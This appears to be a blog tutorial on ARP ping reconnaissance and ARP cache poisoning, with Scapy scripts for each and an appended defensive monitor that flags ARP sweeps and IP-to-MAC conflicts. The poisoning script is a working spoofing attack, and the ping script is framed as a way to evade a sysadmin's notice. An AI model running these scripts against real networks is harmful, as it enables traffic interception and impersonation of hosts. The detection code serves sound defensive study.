Usually we use the ping command to check whether a machine exists at the address we ping; if we get a reply (Pong!) we know there’s a machine at that address. The traditional ping uses the ICMP protocol and sends icmp-echo-request (Ping) and icmp-echo-reply (Pong) packets. A machine can choose to ignore echo requests and not reply in order to hide itself.
We can instead use the ARP protocol, which resolves the IP addresses of hosts on a local area network to their MAC addresses, to ping machines on that LAN. A host has to answer ARP requests in order to communicate at all, so this maps a LAN in a less obvious way and may avoid detection by a diligent sysadmin.
Here’s a Python script that uses the Scapy library to perform an ARP ping on a single target.
# Sends an ARP resolution request (who-has) to broadcast for an IP address
# If a reply is received within the timeout, the host is alive
import sys
from scapy.all import Ether, ARP, srp

TIMEOUT = 2  # seconds to wait for a reply
if len(sys.argv) != 2:
    print("Usage: arp_ping.py IP")
    sys.exit(1)

target = sys.argv[1]
answered, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target),
                           timeout=TIMEOUT, verbose=False)
if len(answered) > 0:
    # answered is a list of (sent, received) pairs
    print(answered[0][0].getlayer(ARP).pdst, "is up")
elif len(unanswered) > 0:
    print(unanswered[0].getlayer(ARP).pdst, "is down")
What is ARP poisoning
Machines on a TCP/IP local area network identify each other and communicate using the physical addresses of their network adapters (MAC addresses). Every machine keeps a list (the ARP cache) of neighboring machines and their MAC addresses. If that list is contaminated, i.e. a machine on the list is recorded with the wrong MAC address, all communication to that machine will be directed to the wrong machine.
ARP poisoning is the method of tricking a machine into saving an entry for an IP address with the wrong MAC address in its ARP table.
How the script works
The following script takes two arguments:
HOST_TO_ATTACK – the machine we want to poison
HOST_TO_IMPERSONATE – the machine we want the poisoned machine to think we are, so that when it wants to communicate with that machine, it will actually communicate with us.
The script sends a who-has (ARP request) packet to broadcast, as if querying the target machine for its MAC address.
The who-has packet carries a fake source IP address (that of the impersonated host) coupled with the attacker’s MAC address.
When the target receives the who-has packet, it stores the false IP-to-MAC pairing in its ARP table.
# Python arp poison example script
# Written by aviran
# visit aviran.org for more details
import sys
from scapy.all import Ether, ARP, get_if_hwaddr, get_if_list, sendp

def get_mac_address():
    # Return the first real (non-null) MAC address among the local interfaces
    my_macs = [get_if_hwaddr(i) for i in get_if_list()]
    for mac in my_macs:
        if mac != "00:00:00:00:00:00":
            return mac
    return None

if len(sys.argv) != 3:
    print("Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE")
    sys.exit(1)

my_mac = get_mac_address()
if not my_mac:
    print("Can't get local mac address, quitting")
    sys.exit(1)

# who-has to broadcast: claims HOST_TO_IMPERSONATE's IP is at our MAC, addressed to HOST_TO_ATTACK
packet = Ether(dst="ff:ff:ff:ff:ff:ff", src=my_mac) / ARP(op="who-has", hwsrc=my_mac, psrc=sys.argv[2], pdst=sys.argv[1])
sendp(packet, verbose=False)
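As an added example (not part of the original post and not the author's code), here is the defender's side of both techniques described above: a small Python monitor that flags the ARP sweep an ARP ping across a subnet produces (one MAC asking who-has for many distinct IPs in a short window) and the IP-to-MAC conflict the poison script's forged who-has creates (an IP previously bound to one MAC now claimed by another). The sample frames, MAC and IP addresses, and the threshold and window values are constructed assumptions; the sniff_live helper shows how the same monitor would be fed real frames with Scapy's sniff().

```python
import collections
import time


class ArpMonitor:
    """Tracks ARP traffic and raises two kinds of alerts:
    (1) 'arp-sweep': one MAC sent who-has for >= sweep_threshold distinct IPs within sweep_window seconds;
    (2) 'mac-conflict': a sender IP that was first seen with one MAC is now claimed by another.
    Threshold and window values are illustrative assumptions, not tuned defaults."""

    def __init__(self, sweep_threshold=20, sweep_window=5.0):
        self.sweep_threshold = sweep_threshold
        self.sweep_window = sweep_window
        self.table = {}  # ip -> first MAC seen claiming it
        self.requests = collections.defaultdict(collections.deque)  # mac -> deque of (ts, pdst)
        self.flagged_sweepers = set()  # MACs already reported, so a sweep is reported once
        self.alerts = []

    def observe(self, ts, op, hwsrc, psrc, pdst):
        """op is 'who-has' (request) or 'is-at' (reply); returns the alerts raised by this frame."""
        new = []
        # Both requests and replies carry a sender IP/MAC pair that peers may cache, so a
        # request with a forged psrc (as in the poison script) is checked the same way.
        # 0.0.0.0 is used by ARP probes and carries no binding, so it is skipped.
        if psrc != "0.0.0.0":
            known = self.table.get(psrc)
            if known is None:
                self.table[psrc] = hwsrc
            elif known != hwsrc:
                new.append(("mac-conflict", psrc, known, hwsrc))
        if op == "who-has":
            q = self.requests[hwsrc]
            q.append((ts, pdst))
            while q and ts - q[0][0] > self.sweep_window:  # drop requests outside the window
                q.popleft()
            targets = {p for _, p in q}
            if len(targets) >= self.sweep_threshold and hwsrc not in self.flagged_sweepers:
                self.flagged_sweepers.add(hwsrc)
                new.append(("arp-sweep", hwsrc, len(targets)))
        self.alerts.extend(new)
        return new


def sniff_live(monitor, count=0):
    """Feed live ARP frames to the monitor with Scapy (needs Scapy and capture privileges)."""
    from scapy.all import ARP, sniff  # imported lazily so the offline demo runs without Scapy

    def handle(pkt):
        if ARP in pkt:
            a = pkt[ARP]
            op = "who-has" if a.op == 1 else "is-at"
            monitor.observe(time.time(), op, a.hwsrc, a.psrc, a.pdst)

    sniff(filter="arp", prn=handle, store=False, count=count)


# Constructed sample traffic (not a real capture); all MACs and IPs are made up.
GATEWAY_MAC = "aa:bb:cc:00:00:01"
ATTACKER_MAC = "02:00:00:00:00:ff"
SAMPLE_FRAMES = []
# Normal: a host asks for the gateway and the gateway answers.
SAMPLE_FRAMES.append((0.0, "who-has", "aa:bb:cc:00:00:10", "192.168.1.10", "192.168.1.1"))
SAMPLE_FRAMES.append((0.1, "is-at", GATEWAY_MAC, "192.168.1.1", "192.168.1.10"))
# ARP ping sweep: one MAC asks who-has for 192.168.1.1 .. 192.168.1.40 within two seconds.
for i in range(1, 41):
    SAMPLE_FRAMES.append((1.0 + i * 0.05, "who-has", ATTACKER_MAC, "192.168.1.200", "192.168.1.%d" % i))
# Poison: a who-has whose sender IP is the gateway's but whose sender MAC is the attacker's.
SAMPLE_FRAMES.append((10.0, "who-has", ATTACKER_MAC, "192.168.1.1", "192.168.1.10"))


def run_demo(frames=SAMPLE_FRAMES):
    """Replay the constructed frames through a fresh monitor and return the alerts raised."""
    mon = ArpMonitor()
    for frame in frames:
        mon.observe(*frame)
    return mon.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The first MAC seen for an IP is trusted as the baseline, so the monitor is only as good as the traffic it saw first; on a real network you would seed `table` from a known-good inventory (or DHCP leases) instead of learning it from the wire.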